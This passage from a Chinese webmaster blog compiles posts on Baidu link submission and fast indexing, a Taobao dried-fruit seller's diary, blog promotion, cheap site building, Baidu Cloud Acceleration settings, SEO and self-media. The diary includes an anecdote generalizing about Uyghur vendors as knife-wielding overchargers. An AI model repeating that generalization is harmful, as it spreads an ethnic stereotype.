自动推送JS代码是百度站长平台最新推出的轻量级链接提交组件,站长只需将自动推送的JS代码放置在站点每一个页面源代码中,当页面被访问时,页面链接会自动推送给百度,有利于新页面更快被百度发现。自动推送由于实现便捷和后续维护成本低的特点,适合技术能力相对薄弱,无能力支持全天候实时主动推送程序的站长。 以下为百度通知原文: 尊敬的搜索合作伙伴: 您好,即日起搜索资源平台恢复“普通收录-自动推送”功能,以便更快发现与收录站点新增资源,降低站点维护成本。特别提醒,自动推送仅对已关联主体的站点开放。感谢您的关注与支持!   主机吧提示:把JS代码部分到网站页面,只要网页有访问,就会自动推送给百度索引,非常有利于网站页面收录哦。 #### 好消息:百度站长平台新增快速收录功能 同时继承熊掌ID权益 5月15日 消息: 近日,百度站长平台新增快速收录功能,可以快速收录网页,同时继承熊掌ID权益。快速收录可用于提交站点新增的时效性资源进搜索,收录时间约 48 小时。 公告显示,当前仍处于绑定状态的移动端页面及移动端自适应站点,PC端页面想要快速收录,可以将网页升级为自适应页面。用户可在原熊掌ID绑定的站点中选择一个继承提交权益,默认提交配额为10。在规定时间( 5 月 13 日- 5 月 25 日)内完成继承设置,逾期未设置系统将收回该权益。 快速收录使用说明: 1、快速收录仅限于提交移动端页面及移动端自适应页面。 2、快速收录工具可以向百度搜索主动推送资源,缩短爬虫发现网站链接的时间,对于高时效性内容推荐使用快速收录工具,实时向搜索推送资源。 3、资源不符合移动资源标准,依然会占用配额,请您谨慎选择提交类型。判断站点是否符合移动体验标准,请参考《百度搜索优质内容指南》及《百度APP移动搜索落地页体验白皮书5.0》。 4、如果网站已通过HTTPS认证工具验证为HTTPS网站,请确保所提交链接的协议头为HTTPS。     以下是百度快速收录上线公告原文: 1. 工具说明 快速收录可用于提交站点新增的时效性资源进搜索,收录时间约 48 小时。 2. 开通范围 4 月 15 日前在搜索资源平台完成熊掌ID站点绑定,且当前仍处于绑定状态的移动端页面及移动端自适应站点,PC端页面想要快速收录,可以将网页升级为自适应页面 3. 开通方式 您可在原熊掌ID绑定的站点中选择一个继承提交权益,默认提交配额为10。请在规定时间( 5 月 13 日- 5 月 25 日)内完成继承设置,逾期未设置系统将收回该权益。继承熊掌ID权益详细步骤如下: 1.搜索资源平台-搜索服务-站点资源-快速收录; 2.在快速收录页面中选择【继承熊掌ID权益】; 3.在当前熊掌ID绑定站点中选择站点,建议选近期提交数据较为频繁的站点; 4.确认站点后,系统会向熊掌ID创建者对应手机号发送验证码,请完成验证步骤; 5.完成验证后,权益继承成功,回到工具页面即可进行数据提交; 4. 提交方式 快速收录包含手动提交和API提交两种方式,使用API提交方式请使用平台提供的最新接口进行推送。 天级收录正式关门,网站想要加快收录只能使用快速收录,因此各位站长可以及时登录站长后台-资源提交-快速收录页面查看开通该功能,以免错过开通权益。 #### 好经验:一个人的淘宝卖货日子 一: 早上醒后,看外边天还黑着,想着就再睡会吧,昨晚睡的太晚,2点多才睡的。我看了下时间,7点半了,虽然乌鲁木齐的天是黑的,可是内地已经天大亮了,人们该吃早饭了吧。 又迷糊了下,心里有事总是睡不着,每天8点开电脑登陆旺旺是必须的,这个要跟着内地的时间走。于是8点起床,天蒙蒙亮了,先打开了电脑,登陆旺旺看了下,没有意外惊喜的订单。 早上锻炼,是我给自己规定下的每天要做的功课,身体是奋斗的本钱。 8点半,跑了一圈步回来,又习惯性的看了下新闻,再就是照看店铺了,流量不是很高,成交也少,这个必须要想办法。 9点半,简单的吃过早饭,开始了打包,是昨晚上的3个。正忙着的时候,同学打电话过来了,他说来乌鲁木齐了,过来找我玩,我高兴之至,一个人的淘宝,有时候实在是太枯闷了。 我把三个包打完 ,同学也到了,看到了我打的包,说也给他发上一单,他送朋友的。 好吧,按照同学的要求,我又给他打了一个包,算钱的时候难免要争执了一番,我都是按照成本价给算,他非要多给。最后,还是依了我,自己的同学,不送他点都感觉过意不去,怎么能多收他的钱呢。 说话间,已经是1点多了,要吃午饭了。在附近找了家饭馆,我做东,要请同学吃一顿的。吃饭间,竟然聊了很多国家大事,呵呵,男人难道都这样吗? 说道今天的友情,我们谈到了钱对友情的冲击和破坏,然后又谈到了对钱的看法,我告诉他,我的一个表叔,07年的时候赔光了家底负债几十万,又开始做农资,现在也有个200来万的资产了。 同学笑了,说,我有两套房子,也有百十万的资产啊。我告诉他,你的资产和他没法比,你是靠着你和你老婆单位好,福利分房,没有多少付出。 我的这个表叔,小学文化,农民的出身,没背景没关系,完全靠自己奋斗的。同学点头了。他又和我说,要是你还在咱们厂里的话, 你也能弄下套房子,也值个几十万了。 和同学吃饭后,我们回来,给同学泡了杯罗布麻茶,呵呵,他说要减肥,喝罗布麻茶会有效果。 我的旺旺上有顾客来了,让我很是高兴,一天下来单子不多,每个单我都很珍惜。同学接电话后,有事要离开了,好吧,他来乌鲁木齐要待一段时间, 见面的机会多的是。 下午,数了下,今天算上同学的单,发了8件货,不知道今天的房租能不能挣出来,现在淘宝的干果行业利润太低了,赔钱发货的事也经常有,因为要走量。晚上,感觉中午喝的那点酒的酒劲一直没去,感觉不舒服。 在不舒服中,晚上没有吃饭,看了一部记录片,《含泪活着》,是微博上推荐的,我就搜了下看看,看得我流泪了,人活着太不容易了。 到了10点多的时候, 稍微感觉舒服点,吃了点饼干,开始整理我的店铺,眼睛都些疼了,也睁不开了,但是我知道我今天必须要做完。 做淘宝卖家,有很多酸甜苦辣。 就记录下酸吧,心酸。 有个顾客,说核桃里有几个坏的,给了中评。我在没有要求他提供照片证据并查验他拍下坏的核桃照片的情况下,就以相信顾客角度,给予他处理,给他打了多次电话,不接,不接。我不能确认核桃是怎样的情况,他是不满意到哪。 顾客是上帝,总得让顾客满意是吧。可能,一般情况下,在不说明如何不好,并不提供证据的情况下,是得不到卖家的认可和补偿的吧。可是,作为一个卖家,如果本着总是怀疑顾客的角度出发, 也是不对的。 所以,应该无理由的相信买家。我就按接近30%的比例给他退款,目的是为了让他满意,知道我是个诚信的卖家。 但是,悲催了。 在我给了他这样的处理后,他仍旧给我挂着中评,联系不回复。 我就在想,如果你去人家的店里买东西,发现有不好的,你挑出来,人家卖货的人给你重新换上好的,或者直接不算你钱,你说是人家卖货的人好还是不好呢?难道人家为你服务了,还不对了吗? 有些人,有些顾客,并不都是好人。 我并不是非得要你把中评改掉,但是我给你解决了问题,那就是问题不存在了,既然问题不存在了,为何还要把评价放在那里呢? 对了,中间这位神人顾客旺旺还联系上了,态度也不好。 你既然收了我的补偿,收了我的钱,为什么还要把像一坨屎一样的评价摆放在那里,来恶心人呢。 做人不厚道。 我唯有希望,你不要再继续网购了,免得再害别人。还真看了你给别人的很多评价了,差评中评都有。 习惯盯着女人胸脯看的,不是色狼就是流氓。 习惯给人中差评的,不是差评师就是良心被狗吃了的,反正是一路货色。 二: 今天,起床后就开始整理店铺,主要搞几个主打产品的图片和描述,搞到了下午,才把两个搞完。 搞完了后,才发现,眼睛很疼,腰也不舒服。 有时我就在想,为了这个淘宝,把自己的身体累坏了,值得吗? 其实有好多事情可以干。 今天,又给淘宝直通车充值了500元,他母亲的,不开直通车就没有流量,就像淘宝的一个讲师说的:做淘宝店,时刻要记得,要让淘宝赚钱。 还想起了另一句话:淘宝赚钱了,做胶带纸箱的赚钱了,卖模板的赚钱了,做差评师也赚钱了,就我没赚钱。 现在的淘宝,不是以前进入就可以赚钱的年代了,要有资金、人力、资源。 一穷二白进入淘宝,结果还是一穷二白,可能比炒股好点,但也不好不到哪里去。 别人都以为做淘宝的很好,可是做了才知其中的艰辛。 现在,经常发一单货,才赚一元钱,为什么呢? 货贵,但是网店竞争激烈,大家都把价格往死里压。新疆的干果,就是有数的那么几十个品种,畅销的,也就那十来个。可好了,每个店,推新品的时候,总是平价或者略亏就推,顾客总认为那样的才实惠便宜啊。 每个店推一个,据说光乌鲁木齐就有上千家网店,再砍掉500家,剩下500家,主推那十来个好卖的产品。结果可想而知,大家拼命比价格,拼价格。拼到最后,钱没赚下,银子花了不少,再拼下去,就是低质求生存,结果顾客便宜没买到好货。 由于这几天流量很低,没有什么单子 ,于是在推广的时候,想到了热词引流。什么是热词呢?关于新疆的就两个字:切糕 于是,我果断的推出了切糕产品。 流量是上来了,可是,也引来了不少别具风采的顾客: 有一位,一上来开口就骂,骂新疆,骂切糕,解释半天,顾客理解了,走人了。 再一位,上来就骂,骂新疆,骂新疆人,骂切糕, 又解释半天,结果人家一个劲的向我道歉。 还一位,骂骂骂,骂新疆,骂切糕,骂新疆人,骂完走人,任我回复不睬我了。 呵呵,他们无论怎么骂,怎么我就不生气呢?主要是,他们骂有所指,和我无关,当然,对切糕事件,我也很理解。 记得以前的时候,我去无锡,有个维族人在桥上卖切糕,我看着挺好看的,就想去买一块吃。然后,问他多少钱,他说2元,便宜嘛,在我还在欣赏切糕的时候,旁边一位当地女士过来了,问多少钱,回答是2元。 于是说:切一块,她比划着切 ,维族人给切了,结果一称,人家卖切糕的维族人要20多元,不大一块。那女的说,2元吗不是?人家维族人比划着刀子说:2元一两。 呵呵,看着那晃动在眼前的刀子,谁不心惊啊。那女士无奈的掏了20多元拿着切糕了。 我当然没敢买啊,我才知道,原来维族人在内地卖东西按两啊,为什么他们在新疆就按公斤呢?唉,所以说,我理解这些上来就开口骂人的人们。 然后,我果断的把这个切糕产品下架。 我看来下,流量引来的了,关联销售却没有一个,还惹了一些骂声。这样的流量,不值得要。 亲,当你早上安静的吃完早餐时,我已经开始工作了,我没有时间出去喝完豆浆,只是一碗清水面,这就是我的早餐,也许您愿意吃清水面,可是你愿意天天吃清水面吗? 亲,当你坐在办公室里忙工作时,闲暇累了会和同事聊聊天;我,孤独的一个人奋战在电脑前或者一堆货物前,没有人帮我替我,我都要自己完成。也许你嫌工作有约束,可是你知道吗,自己做淘宝,很多无形的枷锁也套的人很紧,看似轻松,实则是个耗费人身体健康与精力的事。 亲,当你高高兴下班时,顺便买些自己喜欢吃的带回家;我,还在上班,还在奋斗,一台电脑,一堆货,一个人,还要受着无端客户的评价,还要费劲心思的去推广,还要多方打探寻找好的货源,还要,还要,太多了。 亲,当你和一家人,吃晚饭时,是多么的高兴与幸福啊;我,这时还在清理货,还在分拣货,只是为了给你们提供最好质量的产品。不愿意你们吃着不满意而给我差评,我在努力,尽心,尽力。 亲,当你进入了甜蜜的睡梦中时,我还在打包,为了明天把货早早的发出去。 亲,多么希望我的付出, 得到的是你们的好评和理解啊。吃着好了,就毫无保留的给5分和好评吧,吃着不合口味,也不要给中差评啊,我会给你尽力解决,退货退款都可以,只要你满意。 他**的,做个淘宝,就是做孙子。 分享下销售经验: 1、货源是利润的源泉,一定要找到质量好的货源,价位还有实惠又低,才有钱赚。否则,货源出问题了,没有顾客和回头客不说, 搞不好自己受了辛苦还要赔钱。 2、无论做什么店,做什么产品,都要有个主打产品,把这个主打产品做成爆款。爆款的做法:我目前是用直通车硬推广,主要是我没有时间去做各方面的推广,只有用这个了。 3、抓好自己的回头客,顾客的购物体验好了,会给带来跟过的销售次数和回头客。我的回头客,有一个月内买5次的。 4、产品描述要清晰,有诱惑力,有冲击力,图片要好看。 跟快递聊过才知道,快递总以为我们做淘宝的赚钱,而我们总以为做快递的赚钱,他们想转行做淘宝,而我们,也想过是否去做快递。各有各的难处与千秋。 我们和快递共同的需求是:人,合适的人。 现在的人都干什么去了,怎么到处都找不到人呢? 卖着卖着,市场上没有好货了。卖差货,对做淘宝的来说,等于往死里做。好货,没有了。 头疼此事,货源真是个大问题啊。 有人会说:你不会多压点货吗? 我会说:哥哥呀,我要是有那些钱压货,我还守着个淘宝铺子干什么呀,拿着干什么去不好啊。小本生意,挺难的。 整整,整理了一天的货,网上的店铺一点都没有打理,完全靠自然流量和销量。这样,能行吗,这样店铺就荒废了,可是,不这样,我的货不整理,有单子发什么呀? 就需要不要钱,只管吃住的人员一名,每天给我整理好货,打好包,就可以了,我就在电脑上,努力推广和接单,还有装修店铺。这,成了我的理想了。 三: 做淘宝,真是考验人的耐心。 碰上两位这样的顾客了,来了就一个劲的讲价,讲价。然后给我发别店铺的图片来比较价格,来讲价。 真是,有时候感觉好笑,你又没看见过他们的实物,也没看到过我店的实物,就凭着几张图片,和我讲价,有意思吗?难道非要别人赔钱卖给你,或者送你,才能达到你的要求吗? 流量下降,引流最快的就是直通车了吧,于是花大价钱开了直通车,第二天直通车的消费是42元,通过直通车销售了35元的货,是亏了,亏了。不开车,一个人又要整理货,分拣打包,忙不过来,只好开车了。开车很亏,我知道,可是也只有开了。 这几天,流量很低,然后成交也少,真的着急啊。问了下同行朋友,说他们的也少。这是肿么了么? 然后自己仔细想了想,可能有很多原因。 其一:双11,双12,圣诞,过分透支了消费者的购买需求,还有每天的天天特价,聚划算什么的,这些都分流透支消费者的钱袋。 其二:消费者被透支后,需要歇一会,前面该买的已经都买的差不多了。 其三:上淘宝来淘生活的太多了,双11的191亿,一下子刺激好多人的淘宝开店热情,反正开店成本很低,狼多了,粥没见多多少。 其四:同行同质竞争,都要争个第一页,否则没什么排名哪来的销量,于是我看了好多网店,他们的售价再包邮,如果正常走货肯定是亏钱卖出,估计他们也就3个手段吧: 1、赔钱赚流量和顾客 2、掺杂低质干果在里面或者进货就进低质的 3、虚假标题,标着是特级的,其实是一级或者二级的,标着一级的,肯定是二级的。 现在,干果店真的乱成一锅粥了 ,行业竞争太激烈,也太复杂,大小卖家混战一团,没有更好的手段,就是价格竞争,赔钱的也有,低质的也有。赔钱的,是想赚流量真心做淘宝的,低质的就是纯粹为了赚钱,赚点不干净的钱。 这样下去,肯定是不行的,也是要洗牌的,会有好多坚持不下去的,也会有好多在竞争中脱颖而出的。 思路决定出路,我呢?如果把自己的宝贵生命就这样将交给淘宝,天天钻研他那个狗屁规则,我心不甘,世上赚钱的路子多了去了,我为什么要把时间浪费在淘宝上呢? 现在想想,终于知道马云为什么说:要让100万个卖家,年销售额达到一百万。 小卖家,才是马云赚钱的源泉。小卖家一上来,啥都不懂,要买模板,买工具,买流量,反正是什么都要花钱去买,小卖家越多,给马云交的钱越多。 有心放下淘宝了,不是不想坚持,而是觉得坚持的没有价值,要想做好网店,就要研究好淘宝的狗屁规则,他奶奶奶的,把自己当什么了,还制定个规则让人家死命的学习钻研。 当然,什么圈子里都有个规则。 但是,如果只把眼光放在淘宝上,也许会失去整个森林,整个社会很大,机会也很多,并不只是淘宝有。 天天在房子里,守着电脑,人,眼睛,颈椎,腰,精神,健康,都会出问题的。 看上去很美,实际上是在慢性自杀。 过了年后,想的是好好的整理网店,可是颈椎不舒服,经常犯头晕,也许去年的一冬季的忙活,把身体透支了。看来,过于劳累,透支身体真不好啊,欠的总是要还的。以后说什么也要注意了。 以体会更深,更明白了,这个社会,这年代,靠一个人单打独斗难成大事。 今天,还在等结果的时候,用手机看了个义乌淘宝村的故事,一个做淘宝的,坚持了两年,终于放弃了。我在想,我这样子,是不是该放弃了呢?我的身体也已经在给我发出信号,再这样下去,身体就完蛋了。 哦,想起了淘宝数例的过劳死。 这回,真的知道了,淘宝,其实是个高危职业。 真心希望,做淘宝前要考虑好,现在真的不是上来就创业成功的时候了。那个捡钱的时候已经过去了,现在是拼实力,拼货源,拼人力,拼资金等多方综合条件的时代了。我也曾一直在考虑出路。 有时候觉的自己就是在战场上,独自一人对着一生的战场,战胜了万事大吉,战败了如下深渊。后面,该怎么发展,怎么布局,怎么做,怎么规划,怎么,怎么。 思索当初的发展为什么如此之慢呢? 我想了下: 1、经验不足,一开始的时候,既没有网商的经验,又没有干果的经验。网店琢磨着开起来的时候,我还没有网购过,是个标准的网购盲;干果,开店的时候,我都认不全,连名字都叫不上来,何谈分清品质的等级好坏呢。 2、起步慢,进入角色慢,一步一步的琢磨着走,走了半年,还是半吊子一个,真正做好网商,还是有点难度的,里面知识多,水也不浅。 3、在发力起步时,缺少人手。当我意识到一个很难干起来的时候,一直却找不到合适的人手。自己一个人,里外上下,大事小事,全的了,把吃饭睡觉的时间挤掉,也总是感觉很多事情忙不过来。还把身体累的有点垮。 4、个人原因:有做好的雄心壮志,却没有胆识与魄力,总是瞻头顾尾,谨慎有余,魄力不足,这是很大的缺点。创业的人,胆识与魄力比金钱更重要。正因为这样,自己意识到2次好的囤货机会,都没有做。要是做到了,就是把货到手也赚钱了。 5、还是个人原因。 今天,流量比较少,成交也很少。我看来下别的店,好像我们干果真的进入淡季了,好多店都不是成交很高。 有个上海的朋友曾告诉我,做任何生意,都没有淡季,只有思想的淡季。 是,是这样的。淡季,我要是做到第一,那就是我的旺季了。 有个目标,有个动力,剩下的就是努力了。 我做生意,确实不是个合格的生意人,因为我重感情,因为佛家的慈悲已经深入我内心。但是,我的问题,出在经营方面,我不是经营的天才,自我感觉有时候很鲁钝。经营,才是一个真正商人的真谛。如果,没有经营的概念,那只是一个为生活谋生的小贩而已。 没有流量就没有转化,没有转化就没有订单,没有订单就没有销量,那么流量难来吗?下面推介几种方法吧。 引流方法1: 找到与自己产品先关的站点进行广告投放。一般情况下正规一点的网站丶论坛丶博客的流量最有效,而且价格非常的公道。开淘宝网店的朋友都知道阿里妈妈,那里有非常多的推广高手。所以购买广告位的时候可以考虑到阿里妈妈联系站长,让站长帮忙推荐一个广告位;另外可以试试到试客联盟,那里也有专业的营销师,会给出店铺经营的很多意见,并且有很多试客,试客会帮助把宝贝分享到很多渠道上,并且这些试客中有很多是淘宝达人,分享质量都很高,商品可以得到充分的展示,这样可以为你的网店导入比较客观的流量。 引流方法2: SEO;SEO和百度竞价一直都是做关键词排名的,前者和后者的不同之处在于后者见效比较慢,但是可以长久,投入资金比较少,前者比较烧钱,也就是你如果一旦不给百度钱了,也就注定了你这个网站的排名将会消失,而SEO则是通过一种技术将网站的排名持续性的排在比较靠前的位置。 引流方法3: 泡论坛:利用泡论坛来提升自己店铺的人气和知名度。例如:你是卖服装的。你可以到百度搜索一下服装相关的论坛,在该论坛注册一个帐号,然后进行回复丶发帖的方式进行广告。 不要锁定在一个论坛,这样的论坛都很多个,随便一搜索都有好多种,每个论坛的站长都希望自己的论坛上人气很旺,所以他们是竭尽全力的去推广,而你只需要借助这个平台去推广就可以达到营销的目的。 引流方法4: 即使聊天工具。利用好我们身边的每款即使聊天工具:QQ等等,在细节上下功夫。QQ签名无意是一个很好的广告位。写上自己的广告,你的朋友丶同学丶同事都知道你现在在卖什么,而利用好QQ空间则可以更好的营销他们,将自己的产品推向一个高潮,把QQ空间当作自己营销的舞台。而QQ群也是不可忽视的流量群体,搜索产品相关的QQ群进行宣传,达到销售的目的。另外如果你闲余时有玩微博和微信,同样可以利用它们来进行宣传推广。 引流方法5: 主动出击,守株待兔的几率是非常小的。上天不会只眷恋你,所以还是主动的向你的网友推荐你的宝贝,也许当时他们并没有打算购买,留下一个好的印象,让他收藏一下,也许有一天他就主动来找你,中国人都喜欢在熟人那里买东西,所以这个方法也是非常适用的。 网店的流量决定着顾客的多少,而顾客的多少决定这你的收入是多少,为了让自己店铺赚到更多的银子,我们要利用好每一种可以引流的方法,使自己的网店生意更火爆! 做过淘宝的人,再去开实体店,那就不是那些一直做传统开店的仁能比得了的。我们因为中差评,把品质和客服,做得是那些做传统店铺的基本的好。我们如果和他们通常竞争,倒下去的不是我们。 感悟: 2008年以前的淘宝,好像草原上有群狗,大家在欢快的抢骨头吃。 2010年以前的淘宝,有的狗已经长成了狼,并且有些本身就是狼的,也加入到了草原,草原开始有点沸腾,这个时候,还是不断的有狗加入进来,不过没有那么欢快的到处可以捡到骨头的日子了。 2012年以前的淘宝,猛然间,来了很多老虎,草原上狼和老虎,已经占了半壁江山,那些小小狗儿,要么变成狼,要么变成老虎,要么还是狗,只是可供狗吃的骨头已经很少了。问题是,还有更多的小狗狗受着以前小狗变老虎的诱惑,不断的加入进来。 2013年至今,也有人在不断的加入淘宝。 狗狗们,看清了么?想好了么? 我走了一段弯路,自检,自批,自悔过。 曾经,在做淘宝前,上班时总是不甘心寂寞,又没有第二职业可选,就在业余时间大量学习股票知识,开始炒股,职业投资人成了我的目标,巴菲特成了我的榜样。可是,在花了大量时间和精力后,被套了几年的积蓄,我反省了。于是,好长时间不再碰触股票。 把目光转向了新的行业,选择了电商,因为是未来的趋势。做电商,又离不开淘宝,就这样,选择了淘宝做为创业的开始。 不可否认,我缺少很多的生意天赋,头脑里经商思维萧条淡漠,做了一年的淘宝,发现我才是个入门而已,并且也没有达到我理想的目标。 关键的是,人手成为了我的瓶颈,我久久的无法突破。在这种情况下,股票行情看好,认识了一个做股票的,不断的说赚钱的事,而股票是不需要人手的,也不要天天出去看市场进货,也不必担心产品缺货,更不用担心中差评,还不用拍照处理图片。 再看看我的情况,于是我又心动了,我把淘宝的时间,分割成了淘宝与股票的时间,每天把很多精力投入到了股票上,那段时间,也赚也赔。 我把股票软件关掉,静静的吃了几个葡萄,很新鲜,我的心却复杂难言。 想想,我到底是在干什么呢? 我是个做事业的样子吗? 股票,网店,我真的能兼顾???熊掌鱼翅真的能多得???? 静心,思考了很久。 其实,我是个喜欢做实业的人,干实事的人。做股票,我不是不喜欢,可是这种天天投机性的炒股,不是我的专长,也不是我目前的情况可以做的。 选自:天涯网友 #### 如何从网站内部推广博客 写博客随便写几篇文章以为能吸引他人眼球,那是不太可能的,真正要做到这一点非常 难。因为如今的互联网任何一个领域几乎已经被挖掘,所以你不得不面对强劲的对手。这样一来,你要吸引读者就必须在自己的领域里钻研,写出更多读者喜欢的文 章,区别于他人的文章,而且必须实用,也不是一成不变的写,有时候需要用新鲜有趣的方法去引出你的观点。达到在别人心里印象中:哎哟!这博客值得收藏哦。   好的,下面我来讲一下,我通常会怎么做:   1、博客的名字:   尝试着找一个能定格你自己形象的同时又很突出的名字,醒目一点,也许以后它将成为你的个人品牌。如何让自己的名字好记且有一定影响力?当然也可以用自己名字,严格来讲就应该是创建一个与众不同的博客名,能让他人一看就能记住。   2、文章标题:   取一个有趣而吸引人的文章标题是吸引读者最好的方式了,也许就是这几个 字就能决定别人是否会看你的这篇文章。如果你的标题和互联网众多文章都是一样的,那就没有什么吸引力了。举个例子,一个做娱乐圈评论的朋友,最近关于众多 娱乐圈朋友讨伐周星驰的新闻,他取的评论标题是:周星驰命犯天煞?个人觉得这名字非常不错,非常吸引读者。   3、文章的深度:   不要光写个标题就什么都不管了,这样即使你吸引读者点击了,也换不回下 次的光顾。很多博客都写很简短的文章,附上一两条想法,显然是仓促之作。想要变得与众不同就要挖掘深度。保持简短仍然是很重要的——冗长的文章毕竟不好, 同时寻找一个有用的、比其他博客更具深度的主题,会使你卓而不群。   4、争议性的议题:   尽管有意地制造一些争议性的话题是不好的,但不要去平息所有的争议。争议可以使人人都参与讨论,这是件好事情。当然不要人云亦云,如果你想要放到博客中的内容铺天盖地的都在讨论,那么你就与他们没有区别了。不同的、趣味的话题会吸引读者注意力和好奇心的。   5、文章开头必须引人注意:   文章开头的前两段是最重要的(除标题以外),如果它不够有趣的话,读者会走开,因为他们很忙,他们没有时间也不愿意阅读无聊的文章。但是如果你能以开头的一段文字吸引读者的注意力,他们也许会一直读完的。   6、博客首页分类清晰:   这点相信很多SEO人员都已经清楚了,好处我就不多讲了。必须要简单明了,各版没有多余的东西。   7、插几张令人难忘的图片:   文章配发的图片对于吸引读者注意力来说也很重要。找到流行、吸引人和让人难忘的图片去搭配你的文章内容,当然,它不能过分夸大或者误导你的读者,但一些新奇好玩或至少看起来很有趣是可以的。   8、实用性:   虽然现在存在众多博客,但其中并没有多少值得你花时间浏览。你应该学会 从材料中筛选出有效信息,增加博客的有用性从而实现差异化,有价值的访问者将会感谢你提供如此有用而免费的信息,他们有时会多给你几个链接,这样你的文章 转载率也将非常高。你应该经常问问自己:我如何才能使这篇博客具有实用性呢?   9、页面应该精简有力:   页面上的小玩意、广告、图片、链接会造成读者的困扰,尽可能的把这些东西都去掉,只留下你的页首图片、文字内容以及其他一些收藏链接和导航条。要记住并不是排得越多越吸引眼球。   10、为读者考虑   不要插广告,这样影响读者。也不要放一些不相关的工具,仅仅只是为了一点点流量,我觉得你需要让读者信任,放一些真实有益的东西。在博客上做任何事之前,你需要想一下,这对读者有益吗? 做完内部推广后,我们再来参考主机吧上篇文章《如何在不花钱的情况下免费推广企业网站》做外部推广吧。 #### 如何低成本的建一个个人网站 做为互联人,有一个个人网站是一件非常酷的事情,平时可以分享下自己经历,发发照片,聊聊人生。 相比做抖音视频,文章更适合陶冶情操,所以,建立一个自己的网站很有必要。 但是,建立个人网站也是有成本的,贵的话一年几千几万的费用,今天主机吧来教大家如何低成本建立个人网站。 1.域名 不建议使用COM、NET这类国际域名,原因很简单,贵,现在每年COM域名续费都在涨价,一年COM域名一年续费都要70元,而且据说明年还要涨,好的COM也被人注销光了,很难选到好的域名。主机吧推荐使用CC、CN域名,原因也很简单,续费价格便宜,CN域名续费一年也才35,比COM便宜一半,而且CN域名作为国内的域名,搜索引擎收录非常不错的。 2.服务器 独立服务器、云服务器、VPS这类的不要用了,价格贵,一年几万几千都有,最便宜的也要78百,而且个人网站也不一定用得着这么大。主机吧推荐用虚拟主机,价格便宜,百来块钱一年,可以买到很好的了。而且虚拟主机不需要自己维护,有故障就提交虚拟主机服务商处理就可以了,当然,用虚拟主机一定要找大品牌的安全有保障。 3.程序 网站程序用开源免费的,wordpress、Z-bolg都是不错的选择,不仅免费模板多,很容易把网站建立起来。 国内用户推荐用Z-bolg,一般的虚拟主机足够运行了。 好了,以上就是主机吧关于低成本建站的一些介绍,如果你有建个人网站的需求,可以认真了解下。 #### 如何使用百度云加速升级至IPv6 云加速在2017就已开始布局和改造底层系统结构用以同时支持ipv4 和 ipv6两个网络协议栈,客户无需复杂的操作,只需添加域名到云加速并CNAME指向云加速,一键开启按钮即可享受IPv6带来的更稳定更快速的网络体验,简单又快速。 第一步: 注册与接入云加速 点击查看:如何注册并使用云加速 第二步:开启开关 如下图所示,,开启IPv6服务后的域名,将会被进行特殊的标记。 #### 如何使用百度云加速封禁某IP 经常有些客户需要对一些非法IP禁止访问或者不想这个IP访问你的网站,这时候就需要用到IP黑名单功能。 我们只需要进入百度云加速域名管理 -安全功能-IP防火墙-IP黑名单,添加禁止访问的IP或者IP段即可 添加后这个IP访问你的网站就会提示1006 IP被封禁,很简单。 #### 如何做一个对搜索引擎友好的网站? 在很长一段时间,SEO人员非常热衷讨论的就是建立一个被搜索引擎亲睐的网站,但可能有的时候可能并没有真切的考虑过,什么是才是真正的搜索引擎友好的站点。简单理解:搜索引擎友好的网站,它需要满足搜索引擎的基本要求,确保百度蜘蛛可以便捷的抓取网站上任何有价值的页面,同时他辅助搜索引擎,更好的了解网站架构以及整站的核心内容。那么,如何做一个搜索引擎友好的站点?1、高性能的主机无论你是选择虚拟主机,还是云服务器,为了更好的保证百度爬虫可以快速便捷的抓取站点内容,你可能需要确保主机:①有较高的访问速度,尝试提高带宽、配置MIP、cdn加速。②具有较高的防护能力,数据安全稳定。③定期审查网站日志,分析出现的临时问题。2、合理的网站架构对于网站结构设计,经常是一个被忽略的问题,但它却有利于搜索引擎了解整站内容,因此你需要:①确保URL具有唯一性,符合SEO标准化。②注意面包屑导航的使用。③合理的利用H1标签,在网站的各个URL中。④注意结构化数据的匹配,以及移动端相关搜索权益的获取。3、独特的优质内容对于任何一个搜索引擎而言,它都是一个解决用户搜索需求的工具,因此,你需要确保内容:①有个性、有趣、有吸引力,尝试从不同的角度解决用户搜索需求。②以转化率为目标,它可以是流量、粉丝、排名、产品销售。③尝试利用内容页创建小专题,从多个角度解决一个问题。④当然,它一定是原创的,亦或是附带版权的合理转载。⑤重视站内相关内容的关联,从而降低跳出率。4、积极的展现自己创建一个搜索引擎亲睐的网站,它的一个前提是,更好的让搜索引擎发现它,因此你需要:①创建网站地图、自动提交URL、配置熊掌号。②在高权重网站,适当的建立外部链接。③合理的在站内利用内链以及网站导航,推荐这些页面。④适当的做一些没有nofollow链接的图片广告。⑤有必要的情况下,可以尝试利用社交媒体进行推广。总结:创建一个符合搜索引擎要求的站点,它是一个综合指标的考量,它涉及到整站优化,并不是简单的针对专项内容的优化,甚至有的时候,它还需要考量你的短期与长期的发展战略目标。原创·蝙蝠侠IT https://www.batmanit.com/p/376.html #### 如何做一个成功的自媒体 什么是自媒体?相信大家早有耳闻,不然也不会在最近的一段时间,那么多朋友都开始写文章,有的朋友利用QQ空间、有的是利用微信朋友圈、有的则是搭建自己的博客! 自媒体概念的产生确实让部分人思想顿悟,知道可以让自己成为一个明星,拥有自己的粉丝,和粉丝分享自己的思想!当然,很多人都想成为明星,但是又有多少人真正成了一个明星?除了那少数几个人成功了以外,其他朋友也是在这个概念的引导下凑凑热闹罢了! 在这个浮躁的年代,很少有朋友会静下来想想自己想做什么?为了什么?很多朋友都会说:“当然是为了赚钱!” 是的!赚钱是很多朋友去努力做事的动力,但是为什么对你来说钱又那么的不好赚呢? 那是因为你选择的路没选对,出发点没对,所以就决定了你的自媒体道路的失败!策划哥作为一个专注于精准数据库营销自媒体人,今天来和大家谈谈如何做一个成功的自媒体!我觉得以下5步是打造成功自媒体的关键: 1、个人定位 既然是自媒体,我们就需要对自己有一个准确的定位,要知道自己想做什么,要做什么,在清楚的了解自己的情况下再来决定做什么方面的自媒体!就比如说我本人,我擅长数据库营销,并且清楚的认识到了数据库营销思维可以帮助更多的商家企业赚钱,提升他们业务的转化率,可以避免同行竞争等多个好处,对他们的业务会有很大的帮助,于是我给自己的定位就是做数据库营销,把数据库营销思维以及方法传播出去,帮助更多的人!大家记住,做自媒体的核心是“你帮助的人越多,你得到的就越多!” 2、提供价值 别人为什么要成为你的粉丝,为什么要拥护你,支持你,所以你必须给他们一个支持你的理由!这个理由很简单,那就是给粉丝不断的提供价值。因为你在给粉丝提供价值的时候,帮助他们解决了不少问题,于是粉丝对你心存感激,就会信赖你,从而成为你的忠实粉丝,他们就会经常来看望你,关注你! 3、擅长领域 